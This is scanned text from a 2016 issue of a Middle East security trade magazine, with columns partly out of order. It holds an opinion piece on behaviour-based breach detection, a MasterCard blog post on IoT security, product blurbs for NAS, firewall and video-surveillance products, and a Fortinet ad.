Gartner’s Faria says there are no right or wrong models. He has seen organisations where the CSO reports to the CDO, where the CSO reports to the CIO or to a COO, and where the CISO and CDO don’t report to the same leader at all. “It’s just very important to identify clear responsibilities,” he adds.

In some cases, the CISO and CDO may share responsibilities but report to

The CdO role is an influencing role across the organisation. ou can’t have responsibility for all information across all the company because there are different stakeholders in different business units.


A

OPINION

kEEPINg AN EyE ON uSER bEhAvIOuRBreach discovery can take days using traditional methods, Leslie Lambert, Chief Security and Strategy Officer, Gurucul, shares some steps to follow in implementing a behaviour centric detection response.

ccording to the Verizon 2015 Data Breach Investigations

Report (DBIR), 60 percent of the time, attackers were able to compromise an organisation within minutes. Meanwhile, in more than 75 percent of the cases, the average time to discover breaches was measured in days. These findings indicate a growing “detection deficit” between attackers and defenders. Verizon sees this as one of the primary challenges to the security industry today and going forward.

For incident responders, time spent in the same position, area, or stage of a process, such as the delta between when a compromise occurs and when it is discovered, is called dwell time. Reducing dwell time is critical to enabling successful prevention or resolution of a cyber incident.

The primary reason for the long delays in breach discovery reported by Verizon is that we are still very much focused on defending against intrusions. A new and more effective approach to quickly decode cyber incidents is needed,

Leslie Lambert, Chief Security and Strategy Officer, Gurucul


collected and determine what “good behaviour” looks like. This will make it easier to isolate user behaviours that are suspicious, should be monitored or investigated. Examples of suspicious behaviour may include inappropriate use of elevated access privileges, or more latent threats, such as data breaches.

This should be followed by continuous monitoring of behavioural data in order to assess user access and usage within “trackable” peer groups. The use of peer groups places behaviours in context and helps to expose ‘outliers’ based on the roles each user performs in comparison to other members of their department, project or work groups, etc.

An important subsequent step is to identify and track all authorised access credentials that are in use, including orphaned, shared, third-party and remote access accounts. Most can be used to access sensitive company data, systems and applications, and as a springboard for data breaches. Once a user’s access credentials are hijacked, they can enable attackers to move around the network undetected.

Also, access credentials should be monitored across all networks, voice and data channels, infrastructure, computer systems, devices, databases and applications. As part of this process, any excess access credentials that are not required by users should be revoked. Especially those that do not

OPINION

one that enables us to understand the complex activities occurring on our networks, and what “good” cyber activity looks like. To accomplish this, we need to start at the source of all network activity -- the behaviours of users and entities or devices.

Why focus on behaviours? It’s well documented that users are the weakest link in the security chain and pose the highest risk to our computing environments. Yet, knowledge of user behaviours is where we typically have the least amount of visibility, especially into what users are accessing and their patterns of usage. Active engagement in monitoring, detecting and deriving insight into user access and usage patterns can foretell risky activity. Identifying early warning signs is critical for protecting against sophisticated threats including malicious insiders and external attackers that have hijacked legitimate user accounts.

Let’s examine the steps for implementing activity- and usage-centric incident response.

As a starting point, review all security-related data that is being collected by any form of logging. To make sense of this data establish a baseline of which user access and usage activities are being logged and which are not. This will expose any glaring blindspots in collection schemes.

Next, apply analytic techniques to understand the data that’s been

Identifying early warning signs is critical for protecting against sophisticated threats including malicious insiders and external attackers that have hijacked legitimate user accounts.

match up or conflict with other users in an individual’s relevant peer groups.

In addition, pay close attention to user accounts with elevated access privileges, such as systems or database administrator accounts and system-level accounts on all security and perimeter devices and so on. Some of these accounts may not be used on a regular basis, and should, therefore, be scanned continuously to evaluate whether they need to be removed or disabled.

Once user credentials are being monitored and logged, access activity should be analysed against sensitive or privileged data. For example, which user accounts are accessing customer, supplier or finance data? Why is this type of data being accessed by these user accounts? Are users access privileges consistent with their need to access this type of data?

Being able to differentiate between “good” and “bad” user behaviour is the foundation for gathering actionable incident detection and response intelligence. It is also vital for shortening the dwell time of intrusions and containing or preventing data exfiltration.

AbOuT ThE AuThORLeslie K. Lambert, CISSP, CISM, CISA, CRISC, CIPP/US/G, is the Chief Security and Strategy Officer for Gurucul, an identity-based threat detection and deterrence company. She is the former CISO for Juniper Networks and Sun Microsystems, has over 30 years of experience in information security, IT risk and compliance, security policies, standards and procedures, incident management, intrusion detection, security awareness and threat vulnerability assessments and mitigation.


T

wIll INduSTRy 4.0 bE SAfE?

By Ajay Bhalla, President, Enterprise Security Solutions at MasterCard

blOg

he convergence of the digital and physical worlds is more than a

MasterCard rally cry. It is in fact a fundamental shift that’s driving the Fourth Industrial Revolution or Industry 4.0, where automation, data exchange and manufacturing technologies are going to simplify our lives, drive better experiences and give us more time to focus on things that matter most – our families, friends and experiences.

But to get to this state of safe automation and connectivity, we need to talk about the role of security and innovation. Both are of paramount importance.

When the World Wide Web was first invented, it was not designed with security in mind. The subsequent global expansion has not only brought about enormous change to people and business but has also introduced us to new forms of threats. The Internet of Things (IoT) will offer more opportunity for commerce and positively impact financial inclusion across the world. However, with every new connected device, security needs to be included from the concept stage as a priority. It is more important than ever that we address cybersecurity challenges while fighting hacks, breaches, stolen identities and more – all in an effort to stay ahead of the bad guys. Innovation cannot be done with security as an afterthought. Instead, security and innovation need to be developed hand-in-hand and planned for from idea inception to product rollout, and beyond.

Recently, I was part of a panel discussion at the World Economic Forum in Davos, Switzerland. The panel “Securing the next evolution of the connected world,” featured Sir Tim Berners-Lee, inventor of the World Wide Web and Salesforce.

With this philosophy in mind, it was indeed a timely and exciting panel so I wanted to share some key highlights:

• User experience is king. With the number of connected devices predicted to grow to 25-50bn by 2025, the IoT will converge and change the consumer experience for the better, improving lives both at home and at work, saving time, keeping you safe and healthy so you can spend time on things that matter most like family, friends and passions. Thing-to-thing payments is the future, we need to embrace that it will be wider than the mobile devices we consider today. MasterCard is already embracing this concept, we are developing new ways to pay using smart rings, clothing, vehicle key fobs and our partnership with Samsung to produce Groceries by MasterCard app in use on the new Samsung Family Hub fridge is just the latest example!

• In addition to consumers, for businesses, the opportunity is huge! For example, retailers will join their in-store and digital services together, for an immersive shopping experience, helping shoppers spend in-store in a similar way to online, with digital signage and point-of-sale systems being personalised, making suggestions in store for consumer preferences. To fully take advantage

of this market, the IoT needs to be enabled for commerce.

• Security and trust. I’ve said this many times before, but it’s worth repeating –security is our no. 1 priority at MasterCard and should be for all other companies. The growth and success of the IoT hinges on trust – especially when consumers’ money and data is at stake. Every device has to be a secure commerce device; if not secured, consumers won’t tolerate loss of their data or money or worse yet, will completely abandon participation in the IoT, resorting back to old school ways. Indeed, MasterCard has done a great job to prepare for this evolution with solutions to secure an IoT payments ecosystem—okenisation, digital wallets, biometrics, and anomaly detection using data analytics across our network to spot suspicious device and consumer behaviours.

• Sinking or Swimming – who will succeed? The magic formula is this: 1)create positive consumer experience 2) develop secure products 3) earn the TRUST of customers 4) analyse data insights then use it to solve a problem 5) give consumers a choice to drive greater adoption.

This was a strong session with global leaders and MasterCard at the table as a leader in payments enabling new solutions around secure payments in the IoT world. The feedback was clear that our leadership is understood and we need to keep enhancing the conversations and directions to enable greater commerce in a secure and trusted fashion.


PROduCTS

what it does:My Cloud EX2 Ultra is a two-bay network attached storage (NAS) system from Western Digital.

According to WD, the My Cloud EX2 Ultra NAS is designed from the ground up for creative professionals and prosumers that need to automatically sync content across computers, easily share files and folders and enjoy multiple backup options so they can create their own personalised digital library with ease. The device has been upgraded with a 1.3 GHz dual-core processor enabling users for faster transfer rates and smooth video streaming.

Users can also attach compatible USB 3.0 hard drives to the USB expansion ports on the My Cloud EX2 Ultra to instantly expand their storage capacity.

what you should know:WD highlights that users can also have access to 1 GB of DDR3 memory, allowing them to multitask with ease and leverage applications for HD media streaming, surveillance and much more.

The device has data management and security features in place giving users the capability to securely manage and protect their documents, photos and other digital files. Drive management options include RAID 0, RAID 1; JBOD and spanning modes, while data protection options include NAS to NAS, USB, cloud or LAN/WAN backup.

what it does:According to the security solutions company the new FortiGate 400D and 900D NGFWs were engineered to deliver high-performance security and specifically tailored to meet the demands of mid-sized and enterprise organisations today and into the future. Leveraging Fortinet’s FortiASIC-accelerated performance, both appliances utilise Fortinet’s proprietary Network Processor 6 (NP6), providing the FortiGate 400D with throughput performance of 16 Gbps and propelling the FortiGate 900D to speeds of 52 Gbps.

Coupled with the consolidated feature-sets of the FortiOS operating system, according to Fortinet, the firewalls guarantee improved

Intrusion Prevention System (IPS) stream performance high-throughput, broad security, deep inspection, rich analytics, granular controls and ease-of-use. Reinforced with industry-leading threat intelligence from FortiGuard Labs, the FortiGate 400D and 900D deliver the protection and performance required by mid-sized and enterprise organisations.

what you should know:The FortiGate 900D, according to Fortinet, is designed with the performance and features of an enterprise-grade NGFW. It also has a 52 Gbps NGFW performance and multiple 10 Gigabit Ethernet SFP+, SFP and RJ45 ports.

brand: AxisProduct: Camera Station 5

brand: fortinetProduct: fortigate 400d and 900d Ngfw

brand: Western DigitalProduct: My Cloud EX2 Ultra what it does:

Axis Camera Station 5 is a VMS for mid-size installations. Together with the Axis S10 Series of network video recorders and the vendors’ IP products it offers video surveillance monitoring and recording solution.

According to Axis, the Camera Station 5 featured hardware decoding, integration of third-party IP cameras and Axis Optimised Rendering for high-definition identification and smooth videos with resolutions up to three 4K video streams.

The new surveillance station has an ’Operator Mode,’ which, according to the company, provides a dedicated interface for efficient operation that meets the requirements of the occasional user as well as the more active user in installations such as larger retail stores, schools and manufacturing facilities.

what you should know:A free mobile viewing app available for Android- and iOS-based mobile devices allows users to view live video from cameras as well as recorded video footage.

The Axis Camera Station 5 also introduces support for hardware decoding and Axis Optimised Rendering. The new ‘Scrubbing’ function allows users to quickly search through video footage from multiple cameras at the same time.


INTELLIGENT,SEAMLESS SECURITY

AND YOU CAN HAVE IT TODAY.

Your attack surface is expanding. Content is multiplying. Threat actors are more cunning. Fortinet delivers a single, seamless network security infrastructure,

intelligent enough to defeat attackers and powerful enough to take on tomorrow.

Copyright © 2016 Fortinet, Inc. All rights reserved. Fortinet®, FortiGate®, FortiCare® and FortiGuard®, and certain other marks are registeredtrademarks of Fortinet, Inc., and other Fortinet names herein may also be registered and/or common law trademarks of Fortinet.

Security Without Compromise

FTNT-BrandCamp-PrintAds.indd 1 27/01/16 18:40

Documents

Security Advisor Middle East | Issue 3